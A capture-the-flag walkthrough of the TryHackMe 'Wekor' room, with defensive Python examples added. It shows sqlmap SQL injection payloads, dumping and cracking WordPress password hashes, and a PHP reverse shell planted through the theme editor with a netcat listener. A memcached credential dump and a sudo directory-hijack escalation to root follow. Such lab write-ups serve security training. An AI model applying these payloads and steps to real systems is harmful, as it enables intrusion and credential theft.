Wekor Writeup

TryHackMe: Wekor created by @ustoun0

The creator gives us many hints for this room, starting with the room description, the notes and the flag hints.

Room description:

CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services 😉

Notes

Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you
enjoy it as it is my first time ever creating something like this !

This CTF is focused primarily on enumeration, better understanding of services
and thinking out of the box for some parts of this machine.

Feel free to ask any questions…It’s okay to be confused in some parts of the
box 😉

Just a quick note, Please use the domain : “wekor.thm” as it could be useful
later on in the box 😉

Flag hints

What is the user flag?

Hint: Look at what ports are open 🙂

What is the root flag?
Hint: Sudo -l

Let’s get down to business, shall we?

Before starting, add the wekor.thm domain to /etc/hosts.

echo "[IP]      wekor.thm" | sudo tee -a /etc/hosts

Enumeration

sudo nmap -v -sS -sV -T4 --open -Pn -p- wekor.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are 2 open ports. Port 22 is used for SSH and port 80 for the Apache web server.

I tried to access FTP with an anonymous account, but anonymous login was disabled.

Retrieve the web server's start page.

curl -v http://wekor.thm/

*   Trying 10.10.17.203:80...
* Connected to wekor.thm (10.10.17.203) port 80 (#0)
> GET / HTTP/1.1
> Host: wekor.thm
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 08 Mar 2021 20:51:10 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Sun, 12 Jul 2020 00:29:54 GMT
< ETag: "17-5aa33ac47e480"
< Accept-Ranges: bytes
< Content-Length: 23
< Content-Type: text/html
<
Welcome Internet User!
* Connection #0 to host wekor.thm left intact

Exploring the team site

feroxbuster -q -u http://wekor.thm -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -x php,html,txt

200       10l       20w      188c http://wekor.thm/robots.txt
200        7l       31w      190c http://wekor.thm/comingreallysoon/index.html
200        1l        3w       23c http://wekor.thm/index.html

Let’s check what we found.

curl http://wekor.thm/comingreallysoon/index.html

Welcome Dear Client!

We've setup our latest website on /it-next, Please go check it out!

If you have any comments or suggestions, please tweet them to @faketwitteraccount!

Thanks a lot !
* Connection #0 to host wekor.thm left intact

curl http://wekor.thm/robots.txt

User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting

Opening /it-next in the browser.

What do we have at http://wekor.thm/it-next? It looks like an HTML template, but the internal links point to PHP pages.

Maybe the SQLi from the room description is hidden somewhere here.

I spent many hours fuzzing directories, but the rabbit hole was always near.

SQLMap exploration

sqlmap -u http://wekor.thm/it-next --batch --dbms=mysql --risk 3 --crawl=4 --forms

After some time, sqlmap reports that an SQL injection vulnerability has been detected against ‘wekor.thm’, as shown below.

POST http://wekor.thm/it-next/it_cart.php
POST data: coupon_code=&apply_coupon=Apply%20Coupon
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: coupon_code=&apply_coupon=Apply%20Coupon] (Warning: blank fields detected): coupon_code=&apply_coupon=Apply Coupon
do you want to fill blank fields with random values? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: coupon_code (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: coupon_code=JlIv' OR NOT 7432=7432#&apply_coupon=Apply Coupon

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: coupon_code=JlIv' AND GTID_SUBSET(CONCAT(0x71716b7671,(SELECT (ELT(9501=9501,1))),0x7170706271),9501)-- vrEO&apply_coupon=Apply Coupon

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: coupon_code=JlIv' AND (SELECT 6261 FROM (SELECT(SLEEP(5)))PtyT)-- HgoQ&apply_coupon=Apply Coupon

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: coupon_code=JlIv' UNION ALL SELECT NULL,CONCAT(0x71716b7671,0x7a4942504f474f495461514f43644c4a6e566c644a695852787450507557784a61796c5356497a6d,0x7170706271),NULL#&apply_coupon=Apply Coupon
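The injection sqlmap found is the classic pattern of a user-supplied coupon code concatenated into a query: a quote in the value ends the string literal (the error-based finding) and a crafted condition makes the WHERE clause match every row (the boolean-based finding). The following is an added example, not code from the box or from this writeup, that reproduces that defect class with Python's sqlite3 module and places the parameterized fix beside it. The table layout mirrors the coupons dump shown later in the writeup; the database is constructed in memory and the helper names are my own.

```python
import sqlite3


def make_coupons_db():
    """Constructed stand-in for the 'coupons' database: one table,
    valid_coupons(id, coupon, expire_date), holding the row sqlmap dumped."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE valid_coupons (id INTEGER PRIMARY KEY, coupon TEXT, expire_date TEXT)"
    )
    conn.execute("INSERT INTO valid_coupons VALUES (1, '12345', 'doesnotexpire')")
    conn.commit()
    return conn


def coupon_valid_vulnerable(conn, coupon_code):
    """The defect class sqlmap reported on it_cart.php: the submitted value is
    pasted into the SQL text, so a quote in it terminates the literal and the
    remainder is interpreted as SQL."""
    query = "SELECT id FROM valid_coupons WHERE coupon = '" + coupon_code + "'"
    return conn.execute(query).fetchone() is not None


def coupon_valid_safe(conn, coupon_code):
    """The fix: a bound parameter. The value travels to the engine separately
    from the SQL text, so quotes and operators inside it are only data."""
    query = "SELECT id FROM valid_coupons WHERE coupon = ?"
    return conn.execute(query, (coupon_code,)).fetchone() is not None


def compare(coupon_code):
    """Run both lookups against a fresh database and return (vulnerable, safe).
    A syntax error in the vulnerable branch is reported as the string 'error',
    which is the signal error-based detection relies on."""
    conn = make_coupons_db()
    try:
        vulnerable = coupon_valid_vulnerable(conn, coupon_code)
    except sqlite3.OperationalError:
        vulnerable = "error"
    safe = coupon_valid_safe(conn, coupon_code)
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    # The real coupon, a non-existent one, a tautology, and a lone quote.
    for code in ("12345", "99999", "x' OR 'a'='a", "'"):
        print(repr(code), "->", compare(code))
```

The parameterized version returns True only for the one real coupon; the concatenating version also returns True for the tautology and raises on the lone quote, which is exactly the difference sqlmap measures.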

Now let’s look at what databases we have.

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" --dbs

[...]
[16:23:33] [INFO] fetching database names
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress

[16:23:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/wekor.thm'

[*] ending @ 16:23:33 /2021-03-08/

Apart from the MySQL system databases, we have two databases: coupons and wordpress. Let’s dump them and see if we can find some credentials, and where WordPress is installed.

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables

[...]
Database: coupons
[1 table]
+---------------+
| valid_coupons |
+---------------+
[...]

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables --dump

[...]
Table: valid_coupons
[1 entry]
+----+--------+---------------+
| id | coupon | expire_date   |
+----+--------+---------------+
| 1  | 12345  | doesnotexpire |
+----+--------+---------------+
[...]

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress --tables

[...]
Database: wordpress
[12 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress -T wp_users --dump

[...]
Database: wordpress
Table: wp_users
[4 entries]
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID   | user_url                        | user_pass                          | user_email        | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key                           |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1    | http://site.wekor.thm/wordpress | $P$____________HASH_______31B. | [email protected]   | admin      | 0           | admin        | admin         | 2021-01-21 20:33:37 | <blank>                                       |
| 5743 | http://jeffrey.com              | $P$_______HASH________j10 | [email protected] | wp_jeffrey | 0           | wp jeffrey   | wp_jeffrey    | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
| 5773 | http://yura.com                 | $P$B_________HASH________SV/ | [email protected]    | wp_yura    | 0           | wp yura      | wp_yura       | 2021-01-21 20:35:27 | <blank>                                       |
| 5873 | http://eagle.com                | $P$B________HASH_______6QY/ | [email protected]   | wp_eagle   | 0           | wp eagle     | wp_eagle      | 2021-01-21 20:36:11 | <blank>                                       |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+

So now we have credentials (as password hashes) and the WordPress address, site.wekor.thm.

Let’s add site.wekor.thm to the /etc/hosts file and see how it appears.

echo "[IP]      site.wekor.thm" | sudo tee -a /etc/hosts

We already have some hashes; the next step is to crack them with john and the rockyou wordlist.

cat hashes

admin:$P$____________HASH_______31B.
wp_jeffrey:$P$_______HASH________j10
wp_yura:$P$B_________HASH________SV/
wp_eagle:$P$B________HASH_______6QY/

john --wordlist=/usr/share/wordlists/rockyou.txt ./hashes

Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Remaining 1 password hash
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:26 DONE (2021-03-08 18:25) 0g/s 28315p/s 28315c/s 28315C/s [email protected]@@!!!..*7¡Vamos!
Session completed

After a while, john cracked three of the hashes.

john  ./hashes  --show

wp_jeffrey:PASSWORD_TEXT
wp_yura:PASSWORD_TEXT
wp_eagle:PASSWORD_TEXT

3 password hashes cracked, 1 left

Yura is the WordPress admin. The next step is to install the reverse shell inside WordPress.

Change the host IP in the file
/usr/share/webshells/php/php-reverse-shell.php to your VPN IP.

After that, open the WordPress “Theme Editor” and select the file “404 Template”.

Replace the content of the file with the reverse shell file and
save.

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Start a local netcat listener and make a request to establish the connection.

In one terminal window, start netcat.

nc -nvlp 1234

In another terminal, request a page that does not exist.

curl http://site.wekor.thm/wordpress/index.php/xyz

Now we have a shell session.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ groups
www-data

What users do we have?

[email protected]:/tmp$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
Orka:x:1001:1001::/home/Orka:/bin/bash

Only Orka and root have a login shell.

Looking at the listening ports, you can find something running on port 11211.

netstat -lptu

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 localhost:mysql         *:*                     LISTEN      -
tcp        0      0 localhost:11211         *:*                     LISTEN      -
tcp        0      0 *:ssh                   *:*                     LISTEN      -
tcp        0      0 localhost:ipp           *:*                     LISTEN      -
tcp        0      0 localhost:3010          *:*                     LISTEN      -
tcp6       0      0 [::]:http               [::]:*                  LISTEN      -
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -
tcp6       0      0 ip6-localhost:ipp       [::]:*                  LISTEN      -
udp        0      0 *:ipp                   *:*                                 -
udp        0      0 *:mdns                  *:*                                 -
udp        0      0 *:43825                 *:*                                 -
udp        0      0 *:bootpc                *:*                                 -
udp6       0      0 [::]:mdns               [::]:*                              -
udp6       0      0 [::]:50771              [::]:*             

After searching on Google, we discover that this is a memcached server. A few more searches give us the command to dump the cached data.

/usr/share/memcached/scripts/memcached-tool localhost:11211 dump

Dumping memcache contents
  Number of buckets: 1
  Number of items  : 5
Dumping bucket 1 - 5 total items
add salary 0 1615235112 8
$100,000
add password 0 1615235112 15
---->PASSWORD_TEXT<-----
add email 0 1615235112 14
[email protected]
add id 0 1615235112 4
3476
add username 0 1615235112 4
Orka
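The memcached-tool dump has a simple line format: header lines, then one `add <key> <flags> <exptime> <bytes>` line per item followed by the item's value, whose length is given by the `<bytes>` field. The cache has no authentication and stores values in plaintext, so from a defender's side the useful check is to parse such a dump and report any keys whose names suggest credentials. The following is an added example, not part of the writeup or of memcached's tooling; the sample dump is constructed in the same layout as the one above, with placeholder values instead of the box's real data.

```python
import re

# Constructed sample in the layout memcached-tool prints. The values are
# placeholders, not the contents of the box's cache.
SAMPLE_DUMP = """Dumping memcache contents
  Number of buckets: 1
  Number of items  : 5
Dumping bucket 1 - 5 total items
add salary 0 1615235112 8
$100,000
add password 0 1615235112 15
S3cret-example!
add email 0 1615235112 16
orka@example.org
add id 0 1615235112 4
3476
add username 0 1615235112 4
Orka
"""

# "add <key> <flags> <exptime> <bytes>" as emitted by memcached-tool dump.
ITEM_RE = re.compile(r"^add (\S+) (\d+) (\d+) (\d+)$")

# Key names that usually hold material an attacker would reuse.
SENSITIVE_KEY_RE = re.compile(r"pass|pwd|secret|token|cred|api_?key", re.IGNORECASE)


def parse_dump(text):
    """Return {key: (exptime, value)} from memcached-tool dump output.

    The <bytes> field is authoritative for the value's length, so a value that
    itself contains newlines is reassembled from as many lines as it takes."""
    items = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        match = ITEM_RE.match(lines[i])
        i += 1
        if not match:
            continue  # header or bucket line
        key, _flags, exptime, nbytes = (
            match.group(1),
            int(match.group(2)),
            int(match.group(3)),
            int(match.group(4)),
        )
        value_lines = []
        while i < len(lines):
            value_lines.append(lines[i])
            i += 1
            if len("\n".join(value_lines).encode()) >= nbytes:
                break
        items[key] = (exptime, "\n".join(value_lines))
    return items


def find_sensitive(items):
    """Sorted list of keys whose names look like credentials."""
    return sorted(key for key in items if SENSITIVE_KEY_RE.search(key))


if __name__ == "__main__":
    parsed = parse_dump(SAMPLE_DUMP)
    for key, (exptime, value) in parsed.items():
        print(f"{key:10s} exptime={exptime} value={value!r}")
    print("credential-like keys:", find_sensitive(parsed))
```

The `exptime` values in the dump above are absolute Unix timestamps (1615235112 is 8 March 2021), so the same parser can also be used to report items that never expire or were set long ago.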

OK, now we have Orka’s password.

As Orka, what can you do?

sudo -l

[sudo] password for Orka:
Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin
[email protected]:/tmp$ ls -lha /home/Orka/Desktop/bitcoin
-rwxr-xr-x 1 root root 7.6K Jan 23 15:23 /home/Orka/Desktop/bitcoin

ls -la /home/Orka/Desktop/
total 2176
drwxrwxr-x  2 Orka Orka    4096 Mar  8 17:52 .
drwxr-xr-- 19 Orka Orka    4096 Mar  8 17:49 ..
-rwxr-xr-x  1 Orka Orka 1109564 Mar  8 17:52 bitcoin

You can execute bitcoin with sudo. You can’t modify bitcoin itself, but you can change the Desktop folder that contains it. Let’s replace bitcoin with bash and get root.

[email protected]:/tmp$ cd /home/Orka/
[email protected]:~$ mv Desktop d
[email protected]:~$ mkdir Desktop
[email protected]:~$ cp /bin/bash ./Desktop/bitcoin
[email protected]:~$ sudo /home/Orka/Desktop/bitcoin
[email protected]:~# cat /root/root.txt
FLAG_TEXT
[email protected]:~# cat /home/Orka/user.txt
FLAG_TEXT
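The root step works because the sudoers rule names a binary whose parent directory the same user owns, so the rule is only as strong as the weakest directory on the path. The following is an added example, not part of the writeup, of the audit a defender would run over `sudo -l` output: it extracts the command paths and flags every path component that the user could replace (owned by that user, or world-writable without the sticky bit). The `sudo -l` sample is copied from the output above; the directory tree it is tested against is constructed in a temporary directory, and the function names are my own.

```python
import os
import re
import stat
import tempfile

# The relevant lines of the sudo -l output shown in the writeup.
SAMPLE_SUDO_L = """User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin
"""

# "(runas) [NOPASSWD:] /absolute/path ..." lines under "may run the following commands".
SUDO_CMD_RE = re.compile(r"^\s*\((\S+)\)\s+(?:NOPASSWD:\s*)?(/\S+)")


def parse_sudo_l(text):
    """Return the absolute command paths a sudo -l listing permits."""
    return [m.group(2) for line in text.splitlines() if (m := SUDO_CMD_RE.match(line))]


def writable_components(target, uid):
    """Return every component of `target`'s path (root to leaf) that the user
    with `uid` could replace: entries that user owns, or that are
    world-writable without the sticky bit. Any hit means the sudo rule can be
    turned into arbitrary root code by renaming the directory and recreating
    it with a different file of the same name, which is what happens on this
    box with /home/Orka/Desktop."""
    path = os.path.abspath(target)
    components = []
    while True:
        components.append(path)
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    flagged = []
    for comp in reversed(components):  # report from "/" down to the leaf
        st = os.lstat(comp)  # lstat: a symlinked component is judged on its own
        owned_by_user = st.st_uid == uid
        world_writable = bool(st.st_mode & stat.S_IWOTH)
        sticky = bool(st.st_mode & stat.S_ISVTX)
        if owned_by_user or (world_writable and not sticky):
            flagged.append(comp)
    return flagged


def demo():
    """Build a constructed tree shaped like /home/Orka/Desktop/bitcoin under a
    temporary directory. Everything created here belongs to the current user,
    so the check flags those directories the way it would flag Orka's Desktop.
    Returns (desktop_dir, binary_path, flagged_components)."""
    base = tempfile.mkdtemp()
    desktop = os.path.join(base, "home", "Orka", "Desktop")
    os.makedirs(desktop)
    binary = os.path.join(desktop, "bitcoin")
    with open(binary, "wb") as fh:
        fh.write(b"#!/bin/sh\nexit 0\n")  # placeholder, not the box's binary
    os.chmod(binary, 0o755)
    return desktop, binary, writable_components(binary, os.getuid())


if __name__ == "__main__":
    print("sudo targets:", parse_sudo_l(SAMPLE_SUDO_L))
    desktop_dir, _, flagged = demo()
    print("user-replaceable components under", desktop_dir)
    for comp in flagged:
        print("  ", comp)
```

On the real box the same check would report /home/Orka and /home/Orka/Desktop for Orka's uid; a rule that pointed at a root-owned path such as one under /usr/local/sbin would return nothing.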